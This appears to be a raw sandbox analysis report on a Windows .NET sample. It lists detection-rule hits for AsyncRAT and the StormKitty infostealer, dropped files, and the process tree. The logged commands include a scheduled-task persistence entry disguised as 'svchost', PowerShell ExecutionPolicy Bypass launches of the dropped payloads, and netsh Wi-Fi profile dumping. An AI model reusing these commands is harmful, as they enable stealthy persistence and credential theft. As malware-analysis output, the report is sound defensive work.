                    Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2919350933.000000000339B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000008.00000002.1804100868.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: svchost.exe PID: 3620, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                    Source: 7.2.svchost.exe.7450000.3.raw.unpack, kMtwg0o70HMbUjS709M9.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 7.2.svchost.exe.42d10e8.0.raw.unpack, kMtwg0o70HMbUjS709M9.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: zrrHgsDzgS.exe, zDYbkLNeWL.cs | Base64 encoded string: '/IjSTxAoXEwHFwMyIyDJzNq/Ezvghhl91HD6vZHmtIzEHBOWOXCz6xkRiIG1eF4z/LtFu23Jpa0QIJ1Sf+Ax0hxjVI45V40Z5ERnm3EIUfs=', 'NzkoLGAd20B2wXfQzAKwlaOLNPCzneCrBftsGZdPDLaYelbMv031cBcxd14pMOnvV95C1m4v/fgxOfjpRMmGGw==', 'TbqlEMt6xp6EvJSLjoVPacxdEUptA0/IPDWIfUFw+GnaC2jpi2mS1WiMlA6JFCgjtVkc31bMGU2WPDAIYQ03zw==', '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', 'WYielA5EPy+ENvVfTl39vkuykxCuYTfE2wrLRHFgtq3DOSPQIQBVxdONamdr7Bt4ZLDAhnsYHZ51Bhpo317tvA==', 'Plb0n43ZfBgoATXvFasPWzCe/qpWQlDVS3WiSqSF7BcxkSdaIDFj+N0c39kriaMWfVGZht2J5j76yQWAMP0R2Q==', 'vPZhwp+GIzTgxRJZLlD3Q0Y+p12aM99reTOBWPGPYnIUSQ5lRZIw8+LOYFFI+QzucKBIdCcSV0fUrAcuCySfXw=='
                    Source: svchost.exe.0.dr, zDYbkLNeWL.cs | Base64 encoded string: '/IjSTxAoXEwHFwMyIyDJzNq/Ezvghhl91HD6vZHmtIzEHBOWOXCz6xkRiIG1eF4z/LtFu23Jpa0QIJ1Sf+Ax0hxjVI45V40Z5ERnm3EIUfs=', 'NzkoLGAd20B2wXfQzAKwlaOLNPCzneCrBftsGZdPDLaYelbMv031cBcxd14pMOnvV95C1m4v/fgxOfjpRMmGGw==', 'TbqlEMt6xp6EvJSLjoVPacxdEUptA0/IPDWIfUFw+GnaC2jpi2mS1WiMlA6JFCgjtVkc31bMGU2WPDAIYQ03zw==', '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', 'WYielA5EPy+ENvVfTl39vkuykxCuYTfE2wrLRHFgtq3DOSPQIQBVxdONamdr7Bt4ZLDAhnsYHZ51Bhpo317tvA==', 'Plb0n43ZfBgoATXvFasPWzCe/qpWQlDVS3WiSqSF7BcxkSdaIDFj+N0c39kriaMWfVGZht2J5j76yQWAMP0R2Q==', 'vPZhwp+GIzTgxRJZLlD3Q0Y+p12aM99reTOBWPGPYnIUSQ5lRZIw8+LOYFFI+QzucKBIdCcSV0fUrAcuCySfXw=='
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, zDYbkLNeWL.cs | Base64 encoded string: '/IjSTxAoXEwHFwMyIyDJzNq/Ezvghhl91HD6vZHmtIzEHBOWOXCz6xkRiIG1eF4z/LtFu23Jpa0QIJ1Sf+Ax0hxjVI45V40Z5ERnm3EIUfs=', 'NzkoLGAd20B2wXfQzAKwlaOLNPCzneCrBftsGZdPDLaYelbMv031cBcxd14pMOnvV95C1m4v/fgxOfjpRMmGGw==', 'TbqlEMt6xp6EvJSLjoVPacxdEUptA0/IPDWIfUFw+GnaC2jpi2mS1WiMlA6JFCgjtVkc31bMGU2WPDAIYQ03zw==', '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', 'WYielA5EPy+ENvVfTl39vkuykxCuYTfE2wrLRHFgtq3DOSPQIQBVxdONamdr7Bt4ZLDAhnsYHZ51Bhpo317tvA==', 'Plb0n43ZfBgoATXvFasPWzCe/qpWQlDVS3WiSqSF7BcxkSdaIDFj+N0c39kriaMWfVGZht2J5j76yQWAMP0R2Q==', 'vPZhwp+GIzTgxRJZLlD3Q0Y+p12aM99reTOBWPGPYnIUSQ5lRZIw8+LOYFFI+QzucKBIdCcSV0fUrAcuCySfXw=='
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, jnRLUJegstsF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, jnRLUJegstsF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: svchost.exe.0.dr, jnRLUJegstsF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: svchost.exe.0.dr, jnRLUJegstsF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: zrrHgsDzgS.exe, jnRLUJegstsF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: zrrHgsDzgS.exe, jnRLUJegstsF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@60/232@7/6
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\o6tEeoRxJb0n
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File created: C:\Users\user\AppData\Local\Temp\tmpF775.tmp
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
                    Source: zrrHgsDzgS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: zrrHgsDzgS.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor (4 identical entries)
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process (80 identical entries)
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tmp761C.tmp.dat.15.dr, tmpAD0A.tmp.dat.28.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: zrrHgsDzgS.exe | ReversingLabs: Detection: 86%
Source: zrrHgsDzgS.exe | Virustotal: Detection: 82%
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File read: C:\Users\user\Desktop\zrrHgsDzgS.exe
Source: unknown | Process created: C:\Users\user\Desktop\zrrHgsDzgS.exe "C:\Users\user\Desktop\zrrHgsDzgS.exe"
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\udwnme.exe "C:\Users\user\AppData\Local\Temp\udwnme.exe"
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\luglzv.exe "C:\Users\user\AppData\Local\Temp\luglzv.exe"
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
